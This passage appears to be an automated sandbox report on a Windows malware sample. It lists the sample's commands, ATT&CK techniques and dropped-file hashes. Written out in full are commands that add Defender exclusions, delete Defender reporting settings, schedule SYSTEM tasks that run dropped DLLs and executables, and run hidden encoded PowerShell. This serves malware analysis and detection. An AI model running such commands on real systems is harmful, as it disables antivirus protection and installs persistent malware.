C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xonCRuklPFipnPeqKpR" /t REG_DWORD /d 0 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:1712
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xonCRuklPFipnPeqKpR" /t REG_DWORD /d 0 /reg:643⤵PID:1468
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\hrOORTLiECQfZJVB /t REG_DWORD /d 0 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:1148
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\hrOORTLiECQfZJVB /t REG_DWORD /d 0 /reg:643⤵PID:3340
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu /t REG_DWORD /d 0 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:2232
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu /t REG_DWORD /d 0 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:1492
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\YSrBLfWUtIHnuviW /t REG_DWORD /d 0 /reg:323⤵
- System Location Discovery: System Language Discovery
PID:3100
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\YSrBLfWUtIHnuviW /t REG_DWORD /d 0 /reg:643⤵
- System Location Discovery: System Language Discovery
PID:1444
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ggDvEMFMs" /SC once /ST 06:49:33 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2984
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "ggDvEMFMs"2⤵
- System Location Discovery: System Language Discovery
PID:3540
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ggDvEMFMs"2⤵
- System Location Discovery: System Language Discovery
PID:112
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "MFUxwpyluZmBswWip" /SC once /ST 02:57:29 /RU "SYSTEM" /TR "\"C:\Windows\Temp\YSrBLfWUtIHnuviW\vPOOfGstRnUMkHu\pMAkVIP.exe\" 18 /site_id 525403 /S" /V1 /F2⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:3372
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "MFUxwpyluZmBswWip"2⤵
- System Location Discovery: System Language Discovery
PID:4832
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1280 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:2428
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:1420
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:4056
-
C:\Windows\Temp\YSrBLfWUtIHnuviW\vPOOfGstRnUMkHu\pMAkVIP.exeC:\Windows\Temp\YSrBLfWUtIHnuviW\vPOOfGstRnUMkHu\pMAkVIP.exe 18 /site_id 525403 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:5000 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bKwcWZekAnYWEgmozo"2⤵
- System Location Discovery: System Language Discovery
PID:3772
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵
- System Location Discovery: System Language Discovery
PID:2648 -
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵
- System Location Discovery: System Language Discovery
PID:1960
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵
- System Location Discovery: System Language Discovery
PID:4004 -
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵
- System Location Discovery: System Language Discovery
PID:1428
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ZUXSmeDRU\JpbrWv.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "SEVCueFJyRflUhU" /V1 /F2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2616
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "SEVCueFJyRflUhU2" /F /xml "C:\Program Files (x86)\ZUXSmeDRU\QESSbhn.xml" /RU "SYSTEM"2⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1924
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "SEVCueFJyRflUhU"2⤵
- System Location Discovery: System Language Discovery
PID:2388
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "SEVCueFJyRflUhU"2⤵PID:1428
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "iJzencGmrLwIJF" /F /xml "C:\Program Files (x86)\UBqYudvSNocU2\tzvjHwr.xml" /RU "SYSTEM"2⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3696
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "qYXqheuptEbIX2" /F /xml "C:\ProgramData\hrOORTLiECQfZJVB\dCZWDWQ.xml" /RU "SYSTEM"2⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4080
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "JDYpgkNAOwNKhospY2" /F /xml "C:\Program Files (x86)\xonCRuklPFipnPeqKpR\xpyTzFn.xml" /RU "SYSTEM"2⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1500
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "hPTErtfTjvBJRSQKVfY2" /F /xml "C:\Program Files (x86)\oXjeNNLqKAotC\FMrTanm.xml" /RU "SYSTEM"2⤵
- Scheduled Task/Job: Scheduled Task
PID:3116
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "NGWtXtGwgKKYsphzV" /SC once /ST 12:53:26 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\YSrBLfWUtIHnuviW\RMsBDTrQ\XuOBBBI.dll\",#1 /site_id 525403" /V1 /F2⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:4504
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "NGWtXtGwgKKYsphzV"2⤵
- System Location Discovery: System Language Discovery
PID:5024
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵
- System Location Discovery: System Language Discovery
PID:1928 -
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵
- System Location Discovery: System Language Discovery
PID:4084
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:642⤵
- System Location Discovery: System Language Discovery
PID:1064 -
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:456
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "MFUxwpyluZmBswWip"2⤵
- System Location Discovery: System Language Discovery
PID:3988
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\YSrBLfWUtIHnuviW\RMsBDTrQ\XuOBBBI.dll",#1 /site_id 5254031⤵PID:1144
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\YSrBLfWUtIHnuviW\RMsBDTrQ\XuOBBBI.dll",#1 /site_id 5254032⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:2516 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "NGWtXtGwgKKYsphzV"3⤵
- System Location Discovery: System Language Discovery
PID:4276
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD53684892fc896e6cebea392907b778da8
SHA1efa1aa2f0b87d6ed7e878e4d25a5f7bc733c647e
SHA256b034181450f6fdfca14f314e8991f088b5b8e5a99bfabdb143d1199326666454
SHA5121cd0fc1ca0dc8cd69966d2f2dea8bffc59763f27d3e791d16a6c22e5b98166c046c5fce7cf2f8c5ff7022fa533496e755ada4173a075a0bc24d64921f541f4ad
-
Filesize
2KB
MD5e2e1c287ed6c69a0e695899776983be3
SHA13e21b4e7e5435ca86d990d373f65999354cf02df
SHA256bc69805b4f25c2f841b3aa68056c3d10e174a99ce480d91fd146a3eb74911a7a
SHA5126d1944fbe09c80061af03d44d5c5f2e9a53b28d2c2693ebcbf5f68a01710d1cdc9952f320c45214a68b9084d27cc4cfc7353aec599516a31fc48210e64187fee
-
Filesize
2KB
MD52c7884d2dfe17f71609cce3c768c2f44
SHA1912f5512987a3a20e9288bb89cee97ace2bdd0b0
SHA2563da47c0cbb08a22de32035d8dbebc01cfcf0857580ed2bd46fb89d28efe03e2d
SHA512e698f40990e3b8e9743d08d50289de166a0827c91801e6c1ca34eb97218c78a5f9231699f8950c32dcb1d3dd2b97cb3a08e265604acbda295b1d5a078c06dd20
-
Filesize
2KB
MD5cdc5ab4d82b0870c7eea0227503ad3b0
SHA131015f6ad6a3fb5a5e780be503145c2afb1baf6a
SHA256c76144be3ca57a2217263cd6c19deb4cbacb61b99adafb507d3a05f0017083cd
SHA512798c7df60320ba9b7647ab46ae8b1603fa3444fa85a17e55a0c3da6c8be06f924622d4956e93cb5a367f9bed677557fda1e66dc215730ab4de26b500afd3192a
-
Filesize
1.1MB
MD51092b052c30fb6494bf97f91d826f3b9
SHA1e151541c39e4a4feacd4f174f81c0182a31a720a
SHA25616eb9fb823b2f9c69653efad20c1065d55201f93322b2b838e88ebfeea27f6af
SHA5123f2bf190aa766d012cb594c43dbff54329f77d1ef505c5f617e2fa9b2e3e836710f29f6319354424f236f4b18f4e45e2d5343f8edc57827f317a9084aedb2d88
-
Filesize
2KB
MD5dbf82141000f76a6515c9bb6d278d1cf
SHA19406c3fe1280900acc08ce72532884e43f36afd0
SHA256b426e6c2ca4279d9d8fc22dd7c9fac614ad29f5cb8a4e5022b98c4f48bf61d43
SHA5120c731339b7feeadfe5323531ae6e89d8dc63669ae4ba06f302d64a557a5d149417a267f2cc95a76ecd7a8080298eacb2c70c154e907ce0d9a151188563564532
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json
Filesize187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json
Filesize150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
Filesize
64B
MD5d8b9a260789a22d72263ef3bb119108c
SHA1376a9bd48726f422679f2cd65003442c0b6f6dd5
SHA256d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc
SHA512550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b
-
Filesize
6.3MB
MD5ded964e022a37d93d434091ec75f9881
SHA1e89a551ac1f19dc3838e21157667e2f98d84d06b
SHA2569d8729b9ca0547bf3679e88b9c2c5ae941fcfe67dfd7dfc598cb304d6624ddde
SHA51213f0873cc797eeb7a4a1606ea3dc95f0d1f96bf1dfad286ee3959f0b885426214c24c1ea2422a46191f78063b75200d7ad9065d5654a7758086a9e41f7cf75af
-
Filesize
6.8MB
MD56cb87a9fc7dc1f2a5410fd428f5460f0
SHA12885b2d28a333d7bd9d6488ba2bf7312fc811e3a
SHA256fa622e0a4d023232f16015c8af2f464933217ab600d91ccdaf0099db232c8b52
SHA5124c266dee0538259df0a2f9625abaf410c587e63d10269f9547820582b5758201a5371f705f0cbd65e72348c2276cd8c6b393c49efa095cd47b718ff029733269
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
11KB
MD5d5b58cb44b899339d62f21b0078adbd9
SHA1b24163a65033586362ffc6032994a04cd7d54dca
SHA256ea2b7bb61f68c936a41f43d43cb9b61321cd6fa1a43f6ce96c1ed9af505a3516
SHA512d4e822c4fc51bbf6460801484edf1acdc36ecb0b0e1a9af3d837dd9f64ca374afb4fb5818aae82176b85d0fa14f9406c2daa3c4cd52909e1137a1397533822b8
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize1KB
MD533b19d75aa77114216dbc23f43b195e3
SHA136a6c3975e619e0c5232aa4f5b7dc1fec9525535
SHA256b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2
SHA512676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize11KB
MD57fb1d248a2250115597ed24ddcc34142
SHA180b1d436095b4d130db68551583f392a0a7e543a
SHA2566b226951a98b8e0ac982c2e1fbbfa54296797d5a4d26849045bdf51a487a4739
SHA5122c8ae615dd3cdb7b73b684d7217b112a70c851e3f58a1af9285a39df7b329bf3f1a7e1eba3ae83a9f229bc8d38c604d8f56ea2e0b4b9baba7ca174e4dd7048e9
-
Filesize
6.2MB
MD58cfc8a5c654e986ab3de168ecbc93096
SHA1a745e47565aed873f5f5264543479266d8918a64
SHA2562996bcb9d033414f6dce67539a71bf29250dc19a66424944065bf5cdf285500a
SHA51299398bbaed5f5547331f21c9e9b2eda5b4842ad88b950f1cce4a04202d45a25a83fdd1593f6b15d05fdee7ba4872ba287b4a5e5c1a0c8c337311eb8b3326dac3
-
Filesize
5KB
MD58a23e7417f0e171228321494ead8e634
SHA1929d7a156f7bdff24875772e56f69d2b0715a59f
SHA256fc2c39e0dc4a7e8e5f576cfef0253ef6adca13617ea7983b0f0a0ca2ddab8ef3
SHA512248680d761e09aeac8580416201ccc06e21258f98a9db3187a29ff525896cc79cd91827f2b52a34718f204dabe95d2311314439f74c0cb3019f4b89ce92b0037
-
Filesize
268B
MD5a62ce44a33f1c05fc2d340ea0ca118a4
SHA11f03eb4716015528f3de7f7674532c1345b2717d
SHA2569f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA5129d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732